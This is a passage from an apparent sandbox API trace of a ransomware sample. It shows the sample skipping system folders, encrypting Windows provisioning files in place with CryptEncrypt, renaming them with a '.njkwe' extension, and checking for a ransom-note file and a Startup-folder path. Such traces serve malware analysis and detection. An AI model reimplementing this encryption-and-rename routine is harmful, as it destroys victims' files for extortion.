(lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.452] lstrcmpiW (lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.452] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml") returned 160 [0079.452] StrStrIW (lpFirst="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.452] lstrcmpW (lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.452] lstrcmpW (lpString1="423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.452] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\423__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\423__connections_cellular_telenor (sweden)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.452] GetTickCount () returned 0x11542f1 [0079.452] GetTickCount () returned 0x11542f1 [0079.452] GetTickCount () returned 0x11542f1 [0079.452] GetTickCount () returned 0x11542f1 [0079.452] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.452] GetProcessHeap () returned 0xbe0000 [0079.452] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.452] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28d, lpOverlapped=0x0) returned 1 [0079.454] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.454] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28d, lpOverlapped=0x0) returned 1 [0079.454] GetProcessHeap () returned 0xbe0000 [0079.454] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.454] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.454] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.454] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.454] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.454] CloseHandle (hObject=0x43c) returned 1 [0079.454] GetProcessHeap () returned 0xbe0000 [0079.454] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.454] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\423__connections_cellular_telenor (sweden)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\423__Connections_Cellular_Telenor (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\423__connections_cellular_telenor (sweden)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.455] GetProcessHeap () returned 0xbe0000 [0079.455] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.455] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f65464, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f65464, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f65464, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x287, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", cAlternateFileName="424__C~1.PRO")) returned 1 [0079.455] lstrcmpiW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.455] lstrcmpiW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.455] lstrcmpiW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.455] lstrcmpiW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.455] lstrcmpiW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.455] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml") returned 158 [0079.455] StrStrIW (lpFirst="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.455] lstrcmpW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.455] lstrcmpW (lpString1="424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.455] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\424__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.455] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\424__connections_cellular_telia (sweden)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.456] GetTickCount () returned 0x11542f1 [0079.456] GetTickCount () returned 0x11542f1 [0079.456] GetTickCount () returned 0x11542f1 [0079.456] GetTickCount () returned 0x11542f1 [0079.456] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.456] GetProcessHeap () returned 0xbe0000 [0079.456] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.456] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0079.457] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.458] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0079.458] GetProcessHeap () returned 0xbe0000 [0079.458] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.458] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.458] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.458] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.458] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.458] CloseHandle (hObject=0x43c) returned 1 [0079.458] GetProcessHeap () returned 0xbe0000 [0079.458] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.458] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0079.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\424__connections_cellular_telia (sweden)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\424__Connections_Cellular_Telia (Sweden)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\424__connections_cellular_telia (sweden)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.459] GetProcessHeap () returned 0xbe0000 [0079.459] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.459] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f8b671, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f8b671, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f8b671, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="425__C~1.PRO")) returned 1 [0079.459] lstrcmpiW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.459] lstrcmpiW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.459] lstrcmpiW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.459] lstrcmpiW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.459] lstrcmpiW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.459] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml") returned 164 [0079.459] StrStrIW (lpFirst="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.459] lstrcmpW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.459] lstrcmpW (lpString1="425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.459] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\425__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.459] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\425__connections_cellular_orange (switzerland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.459] GetTickCount () returned 0x11542f1 [0079.460] GetTickCount () returned 0x11542f1 [0079.460] GetTickCount () returned 0x11542f1 [0079.460] GetTickCount () returned 0x11542f1 [0079.460] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.460] GetProcessHeap () returned 0xbe0000 [0079.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.460] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0079.461] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.461] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cc, lpOverlapped=0x0) returned 1 [0079.461] GetProcessHeap () returned 0xbe0000 [0079.461] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.461] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.461] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.462] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.462] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.462] CloseHandle (hObject=0x43c) returned 1 [0079.462] GetProcessHeap () returned 0xbe0000 [0079.462] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.462] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0079.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\425__connections_cellular_orange (switzerland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\425__Connections_Cellular_Orange (Switzerland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\425__connections_cellular_orange (switzerland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.463] GetProcessHeap () returned 0xbe0000 [0079.463] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.463] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f8b671, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90f8b671, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90f8b671, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", cAlternateFileName="426__C~1.PRO")) returned 1 [0079.463] lstrcmpiW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.463] lstrcmpiW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.463] lstrcmpiW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.463] lstrcmpiW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.463] lstrcmpiW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.463] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml") returned 164 [0079.463] StrStrIW (lpFirst="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.463] lstrcmpW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.463] lstrcmpW (lpString1="426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.463] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\426__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.463] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\426__connections_cellular_orange (switzerland)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.463] GetTickCount () returned 0x11542f1 [0079.463] GetTickCount () returned 0x11542f1 [0079.463] GetTickCount () returned 0x11542f1 [0079.463] GetTickCount () returned 0x11542f1 [0079.463] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.463] GetProcessHeap () returned 0xbe0000 [0079.463] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.464] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0079.465] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.465] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0079.465] GetProcessHeap () returned 0xbe0000 [0079.465] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.465] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.465] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.466] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.466] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.466] CloseHandle (hObject=0x43c) returned 1 [0079.466] GetProcessHeap () returned 0xbe0000 [0079.466] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.466] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0079.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\426__connections_cellular_orange (switzerland)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\426__Connections_Cellular_Orange (Switzerland)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\426__connections_cellular_orange (switzerland)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.467] GetProcessHeap () returned 0xbe0000 [0079.467] HeapFree (in: hHeap=0xbe0000, 